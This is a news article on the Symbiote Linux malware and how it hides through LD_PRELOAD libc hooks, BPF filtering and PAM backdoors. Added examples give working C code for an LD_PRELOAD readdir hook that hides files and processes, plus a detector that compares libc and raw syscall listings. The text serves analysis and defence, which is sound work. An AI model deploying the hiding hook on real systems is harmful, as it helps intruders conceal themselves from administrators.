Symbiote: Linux malware that uses eBPF and LD_PRELOAD to hide itself

Researchers from Intezer and BlackBerry have uncovered malware codenamed Symbiote, used to plant backdoors and rootkits on compromised Linux servers. It was found on systems belonging to financial institutions in several Latin American countries. Installing Symbiote requires root access, which the attacker obtains beforehand, for example by exploiting an unpatched vulnerability or by using leaked account credentials. Once installed, Symbiote lets the attacker maintain persistence on the system after the initial compromise, hide the activity of other malicious components, and intercept sensitive data.

What sets Symbiote apart is that it ships as a shared library that the LD_PRELOAD mechanism loads into every process at startup, where it replaces selected calls of the standard C library with its own handlers. Those handlers hide everything related to the backdoor: they omit certain entries from process listings, block access to certain files under /proc, hide files inside directories, remove the malicious shared library from the output of ldd (by intercepting execve and recognising invocations that carry the LD_TRACE_LOADED_OBJECTS environment variable), and suppress the network sockets that belong to the malicious activity.
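The mechanism described above, reduced to a single hook, as an added example that is neither Symbiote's code nor code from the original article. Loaded through LD_PRELOAD, the library interposes readdir() and readdir64() and drops every directory entry whose name starts with an assumed marker prefix (HIDE_PREFIX, chosen here purely for illustration), so tools that walk a directory or /proc through libc, such as ls and ps, no longer report it. The PAM, libpcap and execve hooks the article mentions follow the same pattern: define the libc symbol, resolve the real one with dlsym(RTLD_NEXT, ...), and filter what passes through.

```c
/*
 * Added example (not Symbiote's code and not from the original page): the
 * LD_PRELOAD interposition technique the text describes, reduced to one
 * hook. Every entry whose name starts with HIDE_PREFIX (an assumed marker,
 * chosen here for illustration) disappears from readdir()/readdir64(), so
 * `ls` and /proc-walking tools such as `ps` stop reporting it.
 * Build:  gcc -shared -fPIC -o libhide.so hide.c -ldl
 * Use:    LD_PRELOAD=./libhide.so ls -a /tmp
 * Linux/glibc; not a full rootkit (no PAM, libpcap, execve or socket hooks).
 */
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <stddef.h>
#include <string.h>

#define HIDE_PREFIX "symb_"   /* assumed marker; real malware keys on its own names */

/* Pure decision function, kept separate so it can be tested on its own. */
int should_hide(const char *name)
{
    return name != NULL && strncmp(name, HIDE_PREFIX, strlen(HIDE_PREFIX)) == 0;
}

/* Resolve the real libc symbol that sits behind ours in the lookup order. */
static void *real_sym(const char *name)
{
    return dlsym(RTLD_NEXT, name);
}

/* Interposed readdir: keep calling the real one until an entry survives
 * the filter (or the directory is exhausted). */
struct dirent *readdir(DIR *dirp)
{
    static struct dirent *(*real)(DIR *);
    if (!real)
        real = real_sym("readdir");
    struct dirent *e;
    while ((e = real(dirp)) != NULL && should_hide(e->d_name))
        ;
    return e;
}

#ifdef __GLIBC__
/* Programs built with _FILE_OFFSET_BITS=64 (coreutils, procps) bind to
 * readdir64 instead, so a hook that only covers readdir misses `ls`. */
struct dirent64 *readdir64(DIR *dirp)
{
    static struct dirent64 *(*real)(DIR *);
    if (!real)
        real = real_sym("readdir64");
    struct dirent64 *e;
    while ((e = real(dirp)) != NULL && should_hide(e->d_name))
        ;
    return e;
}
#endif
```

Two properties of this design matter for defenders: the hook lives entirely in user space, so any reader that bypasses libc (a static binary, or a direct getdents64 syscall) still sees the hidden entries; and the loader honours /etc/ld.so.preload for every dynamically linked process, which is why checking that file and the LD_PRELOAD variable is the first triage step on a suspected host.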

To defeat traffic inspection, Symbiote redefines functions of the libpcap library, filters reads of /proc/net/tcp, and loads a BPF program into the kernel that interferes with packet-capture tools and discards packets destined for its own network handlers before any capture tool sees them. The BPF program is registered ahead of other handlers and runs at the lowest level of the network stack, so the backdoor's network activity stays hidden even from analysers started after the malware.

Symbiote also evades file-system activity monitors: instead of opening sensitive files itself, it intercepts the read operations that legitimate applications perform on them (for example, the replaced library functions let it capture a password as the user types it, or capture key material as an application loads it from a file). For remote access, Symbiote hooks several PAM (Pluggable Authentication Module) calls, which lets the attacker log in over SSH with a set of attacker-chosen credentials. There is also a hidden option to escalate to root by setting the HTTP_SETTHIS environment variable.
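The practical consequence of the whole design above (libc hooks for files, /proc and sockets) is that the kernel's answer and libc's answer diverge. The following added check, which is not part of the original article and not Symbiote's code, lists a directory twice: once through readdir() (which a preloaded library may have hooked) and once with the raw getdents64 syscall, which an LD_PRELOAD library cannot interpose. Any name present in the raw view but missing from the libc view is a strong rootkit indicator. The same comparison applies to /proc/net/tcp read with raw open()/read() syscalls versus the filtered view a hooked fopen() returns.

```c
/*
 * Added example (not Symbiote code, not the original page's code):
 * detect a userland readdir() hook by comparing libc's view of a
 * directory with the raw getdents64 syscall, which an LD_PRELOAD
 * rootkit cannot interpose. Linux only.
 * Build: gcc -O2 -o lsdiff lsdiff.c    Use: ./lsdiff /proc
 */
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Layout of the records getdents64(2) returns; defined locally so the
 * program does not depend on a particular libc exposing it. */
struct raw_dirent64 {
    uint64_t       d_ino;
    int64_t        d_off;
    unsigned short d_reclen;
    unsigned char  d_type;
    char           d_name[];
};

struct namelist { char (*v)[256]; size_t n, cap; };

static int push(struct namelist *l, const char *name)
{
    if (l->n == l->cap) {
        size_t ncap = l->cap ? l->cap * 2 : 64;
        void *p = realloc(l->v, ncap * sizeof *l->v);
        if (!p) return -1;
        l->v = p; l->cap = ncap;
    }
    snprintf(l->v[l->n++], sizeof *l->v, "%s", name);
    return 0;
}

/* View 1: whatever libc's readdir() (possibly hooked) reports. */
static int list_libc(const char *path, struct namelist *out)
{
    DIR *d = opendir(path);
    if (!d) return -1;
    struct dirent *e;
    while ((e = readdir(d)) != NULL)
        if (push(out, e->d_name) < 0) { closedir(d); return -1; }
    closedir(d);
    return 0;
}

/* View 2: the kernel's answer, fetched with the raw syscall so a
 * preloaded libc wrapper never gets to filter it. */
static int list_raw(const char *path, struct namelist *out)
{
    int fd = open(path, O_RDONLY | O_DIRECTORY | O_CLOEXEC);
    if (fd < 0) return -1;
    char buf[32768];
    for (;;) {
        long n = syscall(SYS_getdents64, fd, buf, sizeof buf);
        if (n < 0) { close(fd); return -1; }
        if (n == 0) break;
        for (long off = 0; off < n;) {
            struct raw_dirent64 *r = (struct raw_dirent64 *)(buf + off);
            if (push(out, r->d_name) < 0) { close(fd); return -1; }
            off += r->d_reclen;
        }
    }
    close(fd);
    return 0;
}

static int contains(const struct namelist *l, const char *name)
{
    for (size_t i = 0; i < l->n; i++)
        if (strcmp(l->v[i], name) == 0) return 1;
    return 0;
}

/* Returns the number of entries the kernel reports but libc does not
 * (a positive count is a strong rootkit indicator), or -1 on error.
 * Hidden names are printed as they are found. */
int hidden_entries(const char *path)
{
    struct namelist libc_v = {0}, raw_v = {0};
    int hidden = -1;
    if (list_libc(path, &libc_v) == 0 && list_raw(path, &raw_v) == 0) {
        hidden = 0;
        for (size_t i = 0; i < raw_v.n; i++)
            if (!contains(&libc_v, raw_v.v[i])) {
                printf("hidden from readdir(): %s/%s\n", path, raw_v.v[i]);
                hidden++;
            }
    }
    free(libc_v.v);
    free(raw_v.v);
    return hidden;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/proc";
    int h = hidden_entries(path);
    if (h < 0) { perror(path); return 2; }
    printf("%d hidden entries in %s\n", h, path);
    return h ? 1 : 0;
}
```

When the target is /proc, a process that exits between the two listings shows up as a transient mismatch, so treat a single hit as a reason to re-run, not as proof; a stable, repeatable difference is the signal. Run the check from a statically linked binary or with an empty LD_PRELOAD and /etc/ld.so.preload moved aside, and compare its /proc view against ps and its raw /proc/net/tcp against ss, since Symbiote hides in all three places at once.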

Source: opennet.ru